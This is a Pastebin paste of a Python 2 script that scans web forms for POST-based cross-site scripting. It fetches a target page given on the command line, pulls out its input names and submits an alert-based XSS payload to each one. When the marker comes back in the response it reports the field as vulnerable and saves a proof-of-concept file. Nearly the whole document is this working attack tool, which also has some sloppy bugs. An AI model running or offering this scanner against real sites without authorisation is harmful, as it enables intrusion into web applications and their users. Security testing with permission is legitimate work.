SHARE
TWEET

webscan module - xss-over-post

a guest Mar 20th, 2013 102 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2.  
  3. # try_POST_xss.py
  4. #
  5. # first we will GET argv[1]/page.argv[2] to read it
  6. # and find out what names/inputs/submits/etc... there are.
  7. # next we will POST those param-names separetly with 'payload'.
  8.  
  9. # More @ http://hauntit.blogspot.com
  10. # enjoy.
  11.  
  12. import urllib
  13. import urllib2
  14. import re
  15. import sys
  16. import httplib
  17.  
  18. host = sys.argv[1]
  19. path_file = sys.argv[2]
  20. url = host+':80'
  21.  
  22. url_file = url+path_file
  23.  
  24. payload = '\'><body onload=alert(/2222/)>;]#/**'
  25. # if you want I have version 'payloads-from-file' too.
  26.  
  27. print 'Target: ',host
  28. print 'Vuln file: ',path_file
  29. print 'Full URL to attack:' ,url_file
  30. print
  31.  
  32. # first we must GET page, to read whole text to find
  33. # if there is any of our 'vulnerable' ('to find') string.
  34. get_connect = urllib.urlopen('http://'+url_file)
  35. get_response = get_connect.read()
  36. status = get_connect.getcode()
  37.  
  38. print 'Status of requested page: ',status
  39.  
  40.  
  41. # what we're looking for:
  42. #results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
  43. results = re.findall(" name=\"([^\"]+)\"",get_response)
  44.  
  45. #############################################################
  46. # hm ;] one idea to test right now. ;D
  47. poc = open('poc_file_for_POST_xss.html','w')
  48.  
  49. #############################################################
  50.  
  51. # func to send POST to target url+found parameter
  52. def do_post_now(url):
  53.   params = urllib.urlencode ( { results[i] : payload } )
  54.   headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
  55.   connect = httplib.HTTPConnection(url)
  56.   connect.request('POST', path_file, params, headers)
  57.   response = connect.getresponse()
  58.   print response.status, response.reason # 200 OK?
  59.   data = response.read()
  60.   connect.close() # end of test this parameter at this URL
  61.   y=0
  62.   line = data.find('2222')
  63.   if line != -1:
  64.     print '\t[+- (  POST XSS alert!  ) -+]'
  65.     print '\t [+] Found POST XSS in line:' ,line
  66.     print data[y]
  67.     print poc.writelines(data)
  68.    # poc.close() # write&save simple p0c file. ;7
  69.    # lookout here, because in some cases .close() method will generate an error.
  70.    # that's why it's #commented here.
  71.     y=y+1
  72.    
  73. # end of do_post_now(url)
  74. # ---
  75.  
  76. # MAIN:
  77. if len(sys.argv) < 2:
  78.   sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
  79.   sys.exit(1)
  80. else:
  81.  
  82.   # if result found:
  83.   if (len(results)>0):
  84.     print '-------------------------------------------------------------'
  85.     print 'Got some results :) Now we can try to exploit parameters.\n'
  86.  
  87.     i = 0 # next in list
  88.     while i < len(results):
  89.       print 'Found param called: ',results[i]  
  90.    
  91.       print 'Do POST now, for URL: ', url, ' with param: ', results[i]
  92.       # here we'll create a POST for found parameter
  93.       do_post_now(url)
  94.       # end of this POST for this parameter
  95.  
  96.     # and next line:
  97.       i=i+1
  98.     # end of while i loop
RAW Paste Data
Top